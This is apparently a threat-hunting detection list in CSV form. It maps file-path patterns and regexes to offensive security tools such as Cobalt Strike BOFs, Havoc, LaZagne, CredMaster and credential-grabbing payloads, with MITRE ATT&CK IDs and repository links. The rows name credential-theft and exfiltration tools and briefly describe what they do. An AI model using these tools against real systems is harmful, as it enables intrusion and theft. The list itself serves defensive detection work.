"*/crack_list/cracklist_api.py*",".{0,1000}\/crack_list\/cracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/crack_list/dictionary.py*",".{0,1000}\/crack_list\/dictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/crack_list/wordlist.py*",".{0,1000}\/crack_list\/wordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/cracklord.git*",".{0,1000}\/cracklord\.git.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*/cracklord/cmd/*",".{0,1000}\/cracklord\/cmd\/.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*/CrackMapExec.git",".{0,1000}\/CrackMapExec\.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/crackmapexec/cme.conf*",".{0,1000}\/crackmapexec\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","1","N/A","N/A","N/A","N/A" "*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/Crassus.git*",".{0,1000}\/Crassus\.git.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*/Crassus-main*",".{0,1000}\/Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*/crawler.py -u http*",".{0,1000}\/crawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/createforestcache.py*",".{0,1000}\/createforestcache\.py.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/Create-HotKeyLNK.ps1*",".{0,1000}\/Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/createproxydll.sh*",".{0,1000}\/createproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*/createstager.py*",".{0,1000}\/createstager\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/cred_dump.rc*",".{0,1000}\/cred_dump\.rc.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8922","2233","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z" "*/Cred_Dump.sh*",".{0,1000}\/Cred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/credBandit/*",".{0,1000}\/credBandit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*/creddump7*.py*",".{0,1000}\/creddump7.{0,1000}\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Credentials/*.ccache*",".{0,1000}\/Credentials\/.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/credentials/enum_cred_store*",".{0,1000}\/credentials\/enum_cred_store.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/credentials/enum_laps*",".{0,1000}\/credentials\/enum_laps.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/Credentials/firefox_*.txt*",".{0,1000}\/Credentials\/firefox_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/Credentials/msol_*.txt*",".{0,1000}\/Credentials\/msol_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/credentials/SudoSnatch*",".{0,1000}\/credentials\/SudoSnatch.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/credentials/wifigrabber*",".{0,1000}\/credentials\/wifigrabber.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/CredEnum.c*",".{0,1000}\/CredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/CredEnum.cna*",".{0,1000}\/CredEnum\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/CredEnum.h*",".{0,1000}\/CredEnum\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/creditcards.py*",".{0,1000}\/creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/CredMaster.git*",".{0,1000}\/CredMaster\.git.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/credmaster.py*",".{0,1000}\/credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/CredMaster-master.zip*",".{0,1000}\/CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/credmaster-success.txt*",".{0,1000}\/credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/credmaster-validusers.txt*",".{0,1000}\/credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/CredPhisher/*",".{0,1000}\/CredPhisher\/.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/CredPrompt.exe*",".{0,1000}\/CredPrompt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/CredPrompt/credprompt.c*",".{0,1000}\/CredPrompt\/credprompt\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/creds-*/creds.zip*",".{0,1000}\/creds\-.{0,1000}\/creds\.zip.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/creds-summary.nse*",".{0,1000}\/creds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crlfinjection.txt*",".{0,1000}\/crlfinjection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Cronos-Rootkit*",".{0,1000}\/Cronos\-Rootkit.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/Cronos-Rootkit/*",".{0,1000}\/Cronos\-Rootkit\/.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/Cronos-x64.zip*",".{0,1000}\/Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/CrossC2.*",".{0,1000}\/CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 